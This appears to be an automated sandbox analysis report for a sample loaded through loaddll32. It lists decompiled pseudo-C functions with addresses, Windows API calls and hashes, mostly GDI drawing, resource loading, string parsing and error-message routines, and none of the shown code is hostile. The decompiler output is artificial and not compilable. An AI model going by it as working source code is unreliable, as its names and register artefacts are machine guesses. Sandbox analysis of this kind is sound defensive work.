Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: 32149897f634b6194e29c9f0378a13974d2d4b02b7abe2447186e5a37935a4fc
Instruction ID: d55c29845b2d46641e538a18ddbab45f9f6e57c55f26d4d5715bfd5cc8d10f82
Opcode Fuzzy Hash: 32149897f634b6194e29c9f0378a13974d2d4b02b7abe2447186e5a37935a4fc
Instruction Fuzzy Hash: 5751E875A04108EFDB00DBA8C989E9DB7F9AF09314F5481A5F408EB263D738AE46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0071864C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0071864C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t36;
				void* _t49;
				CHAR* _t50;
				void* _t60;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				L00717ACC(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x71877e, _t96,  *[fs:eax], 0x71879b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00704528(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					_t36 = E007187C4(_v8);
					__eflags = _t72 - _t36;
					if(_t72 != _t36) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							__eflags = _t73 - 0x20;
							if(_t73 <= 0x20) {
								break;
							}
							_t60 = E007187AC(_v8);
							__eflags = _t73 - _t60;
							if(_t73 != _t60) {
								 *_t94 = CharNextA( *_t94);
								continue;
							}
							break;
						}
						__eflags =  *_t94 - _t91;
						E00704158( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
					} else {
						E007080C0(_t94,  &_v16, E007187C4(_v8));
					}
					 *((intOrPtr*)( *_v8 + 0x38))();
					while(1) {
						__eflags =  *( *_t94) - 0xffffffffffffffe1;
						if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
							break;
						}
						 *_t94 = CharNextA( *_t94);
					}
					_t49 = E007187AC(_v8);
					__eflags = _t49 -  *( *_t94);
					if(_t49 ==  *( *_t94)) {
						_t50 = CharNextA( *_t94);
						__eflags =  *_t50;
						if( *_t50 == 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
							__eflags =  *( *_t94) - 0xffffffffffffffe1;
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
					}
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E00718785);
				return L00717B88(_v8);
			}

0x0071864d
0x0071864f
0x00718657
0x0071865a
0x0071865c
0x0071865f
0x0071866d
0x00718673
0x00718683
0x0071868b
0x00718695
0x007186a3
0x007186a1
0x007186a1
0x0071875c
0x0071875e
0x00718762
0x00000000
0x00000000
0x007186b4
0x007186b9
0x007186bb
0x007186d3
0x007186e1
0x007186e3
0x007186e5
0x007186e8
0x00000000
0x00000000
0x007186ed
0x007186f2
0x007186f4
0x007186df
0x00000000
0x007186df
0x00000000
0x007186f4
0x007186f8
0x007186ff
0x007186bd
0x007186cc
0x007186cc
0x0071870c
0x0071871b
0x00718720
0x00718722
0x00000000
0x00000000
0x00718719
0x00718719
0x00718727
0x0071872e
0x00718730
0x00718735
0x0071873a
0x0071873d
0x0071873f
0x00718746
0x00718746
0x00718749
0x00718751
0x00718758
0x00718758
0x00718749
0x00718730
0x0071876a
0x0071876d
0x00718770
0x0071877d

APIs

CharNextA.USER32(?,?,00000000,0071879B), ref: 0071869C
CharNextA.USER32(?,?,00000000,0071879B), ref: 00718714
CharNextA.USER32(?,?,?,00000000,0071879B), ref: 00718735
CharNextA.USER32(00000000,?,?,?,00000000,0071879B), ref: 0071874C

Strings

, xrefs: 007186E5

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-3916222277
Opcode ID: de30f8bec98a9c1b1706d675172bbdd95e578e3d8167b05a4832f2f23a99874a
Instruction ID: b5fd93c35cbf4aeb4dc645064dbe57f7795b022e3c15fc3ee229b7c4b8b42648
Opcode Fuzzy Hash: de30f8bec98a9c1b1706d675172bbdd95e578e3d8167b05a4832f2f23a99874a
Instruction Fuzzy Hash: AC419B74A00144DFCB60EFBCC895899B7F5EF9A3007240998E480DB3D2DB38AD81DB02

Uniqueness

Uniqueness Score: -1.00%

Function 00722024 Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00722024(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				L00721ED4(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00706590();
				_v16 = 0;
				_push(_t46);
				_push(0x7220c1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L007066F0();
					_v12 = _t29;
					_push(_v16);
					L007066C8();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E007220C8);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L007066F0();
				}
				return DeleteDC(_v16);
			}

0x0072202d
0x00722031
0x0072203a
0x00722041
0x00722044
0x00722046
0x0072204b
0x00722050
0x00722051
0x00722056
0x00722059
0x0072205e
0x00722060
0x00722062
0x00722063
0x00722066
0x00722067
0x0072206c
0x00722072
0x00722073
0x00722073
0x00722091
0x00722097
0x0072209a
0x0072209d
0x007220a6
0x007220a8
0x007220ad
0x007220b1
0x007220b2
0x007220b2
0x007220c0

APIs

Part of subcall function 00721ED4: GetObjectA.GDI32(?,00000054), ref: 00721EE8

7378A590.GDI32(00000000), ref: 00722046
7378B410.GDI32(?,?,00000000,00000000,007220C1,?,00000000), ref: 00722067
7378B150.GDI32(?,?,?,00000000,00000000,007220C1,?,00000000), ref: 00722073
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0072208A
7378B410.GDI32(?,00000000,00000000,007220C8,?,00000000), ref: 007220B2
DeleteDC.GDI32(?), ref: 007220BB

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$B410$A590B150BitsDeleteObject
String ID:
API String ID: 3290156324-0
Opcode ID: 3ee6a0b2c46e88b648510291e836c060c4cc7a0128ceb59666ca065ec7bcd58b
Instruction ID: 1bbb34442d0d0bf60fa812c93502cf440d4e5dbc23f80930977483c04fe49341
Opcode Fuzzy Hash: 3ee6a0b2c46e88b648510291e836c060c4cc7a0128ceb59666ca065ec7bcd58b
Instruction Fuzzy Hash: D7118CB5A00204FBDB20DBA8CC95F9EBBECAF48700F508564B914E72D2D678D910C764

Uniqueness

Uniqueness Score: -1.00%

Function 00721864 Relevance: 9.1, APIs: 6, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00721864(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E007028C8(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00706590();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E007217CC(_t32) == 0) {
						E0072165C( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L007065B8();
					_t31 = _t15;
				}
				return _t31;
			}

0x0072186f
0x00721871
0x00721879
0x007218b3
0x007218c1
0x0072187b
0x0072187b
0x0072187d
0x00721882
0x00721886
0x0072189f
0x007218a6
0x007218ac
0x007218ac
0x007218cc
0x007218d4
0x007218ea
0x007218ea
0x007218ef
0x007218f1
0x007218f2
0x007218f7
0x007218f7
0x00721904

APIs

7378A590.GDI32(00000000,00000000,?,?,007253E7,?,?,?,?,00723EE7,00000000,00723F73), ref: 0072187D
SelectObject.GDI32(00000000,00000000), ref: 00721886
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,007253E7,?,?,?,?,00723EE7), ref: 0072189A
SelectObject.GDI32(00000000,00000000), ref: 007218A6
DeleteDC.GDI32(00000000), ref: 007218AC
7378A8F0.GDI32(?,00000000,?,?,007253E7,?,?,?,?,00723EE7,00000000,00723F73), ref: 007218F2

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378ObjectSelect$A590ColorDeleteTable
String ID:
API String ID: 747582061-0
Opcode ID: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
Instruction ID: 3db1b9ca3360ffbe48dde1ace52c558d88ddf324fff4daa86efe920d192a0d88
Opcode Fuzzy Hash: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
Instruction Fuzzy Hash: BF01B561604320E2E214B769AC5BA6B72EDAFD0720F54DA1DB588972C2E67DC81483A2

Uniqueness

Uniqueness Score: -1.00%

Function 00719850 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00719850(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ecx;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t30;
				void* _t31;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;

				_v8 = _t24;
				_t32 = __edx;
				_t23 = __eax;
				_t30 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t30;
				if(_t30 == 0) {
					EnumWindows(_t33);
				}
				_t5 = _t23 + 0x10; // 0x7198f4
				_t31 = LoadResource(_t32,  *_t5);
				 *(_t23 + 0x14) = _t31;
				if(_t31 == 0) {
					EnumWindows(_t33);
				}
				_t7 = _t23 + 0x10; // 0x7198f4
				_push(SizeofResource(_t32,  *_t7));
				_t8 = _t23 + 0x14; // 0x719568
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00719528(_t23, _t25, _t18);
			}

0x00719857
0x0071985a
0x0071985c
0x0071986c
0x0071986e
0x00719873
0x00719876
0x0071987b
0x0071987c
0x00719886
0x00719888
0x0071988d
0x00719890
0x00719895
0x00719896
0x007198a0
0x007198a1
0x007198a5
0x007198ae
0x007198b9

APIs

FindResourceA.KERNEL32(00700000,?,?), ref: 00719867
EnumWindows.USER32 ref: 00719876
LoadResource.KERNEL32(00700000,007198F4,007154E8,00700000,00000001,?,?,007197C1,?,?,?,?,?,0076BB73,0000000A,0000001F), ref: 00719881
EnumWindows.USER32 ref: 00719890
SizeofResource.KERNEL32(00700000,007198F4,00700000,007198F4,007154E8,00700000,00000001,?,?,007197C1,?,?,?,?,?,0076BB73), ref: 0071989B
LockResource.KERNEL32(00719568,00000000,00700000,007198F4,00700000,007198F4,007154E8,00700000,00000001,?,?,007197C1,?), ref: 007198A5

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Resource$EnumWindows$FindLoadLockSizeof
String ID:
API String ID: 3300621414-0
Opcode ID: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
Instruction ID: 0c2f131d48dcdab0f0c7ed046faae67479347fe56bd8c01f070b18c5801fcc7d
Opcode Fuzzy Hash: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
Instruction Fuzzy Hash: 3DF0A4B3604204EF8745EE6CAC95D9B77ECDE893A03100169FA0CD7386DA38DE5243B4

Uniqueness

Uniqueness Score: -1.00%

Function 00720F48 Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00720F48(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E00720724( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E00720724( *((intOrPtr*)(_t36 + 0x14))));
				if(E00720804( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(L0071FA64(E007206E8( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), L0071FA64(E007206E8( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x00720f49
0x00720f54
0x00720f66
0x00720f75
0x00720faf
0x00720fc0
0x00720f77
0x00720f89
0x00720f9a
0x00720f9a

APIs

Part of subcall function 00720724: CreateBrushIndirect.GDI32(?), ref: 007207CE

UnrealizeObject.GDI32(00000000), ref: 00720F54
SelectObject.GDI32(?,00000000), ref: 00720F66
SetBkColor.GDI32(?,00000000), ref: 00720F89
SetBkMode.GDI32(?,00000002), ref: 00720F94
SetBkColor.GDI32(?,00000000), ref: 00720FAF
SetBkMode.GDI32(?,00000001), ref: 00720FBA

Part of subcall function 0071FA64: GetSysColor.USER32(?), ref: 0071FA6E

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
Instruction ID: 06702887bd7f8c03420d442c9576a7f737ebd03edaf346f048b7d38717546cf8
Opcode Fuzzy Hash: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
Instruction Fuzzy Hash: 10F07DB5641210DBDF40FFB8EADAD0A67D8AF443157044590F908DF297CA6DD8208B71

Uniqueness

Uniqueness Score: -1.00%

Function 0070B6B4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0070B6B4(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x76f668; // 0x700000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0070B6A8(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E007089EC( &_v273, 0x104, E0070C79C(0x5c) + 1);
				_t74 = 0x70b834;
				_t86 = 0x70b834;
				_t83 =  *0x707204; // 0x707250
				if(E00703400(_t87, _t83) != 0) {
					_t74 = E00704528( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00708988(_t74, 0x70b834);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x70b838;
					}
				}
				_t51 =  *0x76e2dc; // 0x706fb4
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x76f668; // 0x700000
				LoadStringA(E00705388(_t53),  *_t16,  &_v790, 0x100);
				E007031C4( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00709010(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00708988(_v8, _t86);
			}

0x0070b6b4
0x0070b6c0
0x0070b6c3
0x0070b6c5
0x0070b6d1
0x0070b6e0
0x0070b70a
0x0070b710
0x0070b71c
0x0070b721
0x0070b727
0x0070b727
0x0070b745
0x0070b74a
0x0070b74f
0x0070b756
0x0070b763
0x0070b76d
0x0070b771
0x0070b778
0x0070b781
0x0070b781
0x0070b778
0x0070b792
0x0070b797
0x0070b79b
0x0070b7a6
0x0070b7b3
0x0070b7be
0x0070b7c4
0x0070b7d1
0x0070b7d7
0x0070b7e1
0x0070b7e7
0x0070b7ee
0x0070b7f4
0x0070b7fb
0x0070b801
0x0070b81d
0x0070b830

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0070B6D1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0070B6F5
GetModuleFileNameA.KERNEL32(00700000,?,00000105), ref: 0070B710
LoadStringA.USER32 ref: 0070B7A6

Strings

Prp, xrefs: 0070B756

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: Prp
API String ID: 3990497365-3740376554
Opcode ID: 3403390dc3698bf674d2c4a264162b309b78ef3fc0ea61a9ac33420bcb5273bc
Instruction ID: 66a43075f6424d3adcecac822c004026dd99201293f627bdb61538a014f83f88
Opcode Fuzzy Hash: 3403390dc3698bf674d2c4a264162b309b78ef3fc0ea61a9ac33420bcb5273bc
Instruction Fuzzy Hash: 06410171A00258DBDB21DB68CC85BDAB7FCAB18301F4442E6E548E7292D7789F84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0070B6B2 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0070B6B2(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_t105 = __fp0;
				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x76f668; // 0x700000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0070B6A8(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E007089EC( &_v273, 0x104, E0070C79C(0x5c) + 1);
				_t75 = 0x70b834;
				_t89 = 0x70b834;
				_t85 =  *0x707204; // 0x707250
				if(E00703400(_t92, _t85) != 0) {
					_t75 = E00704528( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00708988(_t75, 0x70b834);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x70b838;
					}
				}
				_t51 =  *0x76e2dc; // 0x706fb4
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x76f668; // 0x700000
				LoadStringA(E00705388(_t53),  *_t16,  &_v790, 0x100);
				E007031C4( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00709010(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00708988(_v8, _t89);
			}

0x0070b6b2
0x0070b6c0
0x0070b6c3
0x0070b6c5
0x0070b6d1
0x0070b6e0
0x0070b70a
0x0070b710
0x0070b71c
0x0070b721
0x0070b727
0x0070b727
0x0070b745
0x0070b74a
0x0070b74f
0x0070b756
0x0070b763
0x0070b76d
0x0070b771
0x0070b778
0x0070b781
0x0070b781
0x0070b778
0x0070b792
0x0070b797
0x0070b79b
0x0070b7a6
0x0070b7b3
0x0070b7be
0x0070b7c4
0x0070b7d1
0x0070b7d7
0x0070b7e1
0x0070b7e7
0x0070b7ee
0x0070b7f4
0x0070b7fb
0x0070b801
0x0070b81d
0x0070b830

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0070B6D1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0070B6F5
GetModuleFileNameA.KERNEL32(00700000,?,00000105), ref: 0070B710
LoadStringA.USER32 ref: 0070B7A6

Strings

Prp, xrefs: 0070B756

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: Prp
API String ID: 3990497365-3740376554
Opcode ID: 671a0df4136df44b78e3aa40a358bfd46bcc5b69e41d84091ca9513a50971042
Instruction ID: 7e88ba56a25eb977ad5fc1b95d74dec5e15f1141ee003684c129d3b5cab44376
Opcode Fuzzy Hash: 671a0df4136df44b78e3aa40a358bfd46bcc5b69e41d84091ca9513a50971042
Instruction Fuzzy Hash: A6410D70A00258DBDB21EB68CC85BDAB7FCAB18301F4442E5E548E7292DB789F84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0071CAB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0071CAB6(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x76e314; // 0x76f034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x76e130; // 0x713cc8
					L0070B9FC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					L00703A00();
				}
				if(_t53 <= 0) {
					E0071CA90();
				} else {
					E0071CA9C(_t53);
				}
				_v16 = 0;
				_push(0x76f870);
				L00706368();
				_push(_t72);
				_push(0x71cc46);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x76c404, _v16);
				_push(_t72);
				_push(0x71cc27);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L16:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0071CC2E);
					return E00703274(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0071707C(_v16, 0);
						E00716F6C(_v16, 0);
						L007064A8();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x71cbf1, _t72, 0x76f870);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x71cbc2;
						 *[fs:eax] = _t67;
						_push(E0071CBF8);
						_push(0x76f870);
						L00706368();
						return 0;
					} else {
						goto L16;
					}
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 0071CAC3
GetCurrentThreadId.KERNEL32 ref: 0071CAD2
RtlEnterCriticalSection.KERNEL32(0076F870), ref: 0071CB17
InterlockedExchange.KERNEL32(0076C404,?), ref: 0071CB33

Strings

LXq, xrefs: 0071CAEC

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID: LXq
API String ID: 2380408948-3550559040
Opcode ID: da5d096b80c2e3719e5c063d7e7f99ff6ec0d95e6f91ffa7921161fc8be4518e
